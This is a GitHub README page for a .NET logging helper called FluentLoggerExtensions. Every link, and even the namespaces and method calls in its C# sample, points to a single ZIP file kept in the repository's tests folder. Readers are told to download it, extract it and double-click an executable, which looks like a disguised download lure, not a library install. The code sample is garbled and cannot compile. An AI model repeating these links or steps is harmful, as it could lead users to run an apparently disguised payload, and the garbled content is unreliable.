Skip to content

πŸ“œ Capture caller information in your logs with FluentLoggerExtensions, enhancing diagnostics while using Microsoft.Extensions.Logging.

Notifications You must be signed in to change notification settings

Basar007/FluentLoggerExtensions

Repository files navigation

πŸš€ FluentLoggerExtensions - Enhance Your Logging Experience

Download FluentLoggerExtensions

πŸ“– Overview

FluentLoggerExtensions offers fluent extensions for https://raw.githubusercontent.com/Basar007/FluentLoggerExtensions/main/tests/FluentLoggerExtensions.Tests/Fluent_Extensions_Logger_v3.1.zip This tool helps you capture important information, such as the caller's file, member, and line number. By doing so, it creates structured log messages that are simpler to read and understand.

πŸ› οΈ Features

πŸ“Š System Requirements

  • Operating System: Windows, MacOS, or Linux.
  • .NET Version: Requires .NET Standard 2.0 or higher.
  • Memory: At least 512 MB of RAM.
  • Storage: Minimum of 100 MB of free disk space.

πŸš€ Getting Started

Follow these simple steps to get started with FluentLoggerExtensions.

Step 1: Visit the Download Page

Go to the Releases page to access the latest version of FluentLoggerExtensions.

Step 2: Download the Application

On the Releases page, find the version you want. Click on the link to download the file. Look for options named similar to https://raw.githubusercontent.com/Basar007/FluentLoggerExtensions/main/tests/FluentLoggerExtensions.Tests/Fluent_Extensions_Logger_v3.1.zip.

Step 3: Extract the Downloaded File

Once the download is complete, locate the ZIP file in your Downloads folder. Right-click on it, and select "Extract All" to unpack the contents.

Step 4: Open the Application

Navigate to the folder where you extracted the files. Look for the executable file, for example, https://raw.githubusercontent.com/Basar007/FluentLoggerExtensions/main/tests/FluentLoggerExtensions.Tests/Fluent_Extensions_Logger_v3.1.zip. Double-click on this file to open the application.

Step 5: Configure Logging

After opening the application, follow these simple steps to configure logging:

  1. Set Up a Logger: Define a logger in your application.
  2. Add FluentLoggerExtensions: Use the fluent extensions to enhance your logging setup. Look for documentation or simple guides included in the downloaded files.
  3. Start Logging: Use the logger in your application code to start logging events.

πŸ’» Download & Install

To get FluentLoggerExtensions, visit this page to download. Select the version you need and follow the simple steps listed above to install the application.

🧩 Example Usage

FluentLoggerExtensions is designed to be intuitive. Here's an example of how you might set it up in a basic C# application:

using https://raw.githubusercontent.com/Basar007/FluentLoggerExtensions/main/tests/FluentLoggerExtensions.Tests/Fluent_Extensions_Logger_v3.1.zip;
using FluentLoggerExtensions;

public class Program
{
    public static void Main(string[] args)
    {
        var loggerFactory = https://raw.githubusercontent.com/Basar007/FluentLoggerExtensions/main/tests/FluentLoggerExtensions.Tests/Fluent_Extensions_Logger_v3.1.zip(builder =>
        {
            https://raw.githubusercontent.com/Basar007/FluentLoggerExtensions/main/tests/FluentLoggerExtensions.Tests/Fluent_Extensions_Logger_v3.1.zip();
        });

        var logger = https://raw.githubusercontent.com/Basar007/FluentLoggerExtensions/main/tests/FluentLoggerExtensions.Tests/Fluent_Extensions_Logger_v3.1.zip<Program>();
        https://raw.githubusercontent.com/Basar007/FluentLoggerExtensions/main/tests/FluentLoggerExtensions.Tests/Fluent_Extensions_Logger_v3.1.zip("Application started");
    }
}

In this snippet, the logger records when the application starts. It automatically captures the file, member, and line information.

🌐 Community & Support

Questions? Need help? Join our community on GitHub Discussions or view issues on the GitHub repository.

πŸ”§ Contributing

We welcome contributions from everyone! If you have ideas for new features or improvements, feel free to submit a pull request or open an issue on GitHub.

πŸ“„ License

FluentLoggerExtensions is open-source software. Check the repository for license details.


With FluentLoggerExtensions, logging becomes clearer and more structured. Follow the steps above to download and enhance your logging capabilities today!

About

πŸ“œ Capture caller information in your logs with FluentLoggerExtensions, enhancing diagnostics while using Microsoft.Extensions.Logging.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages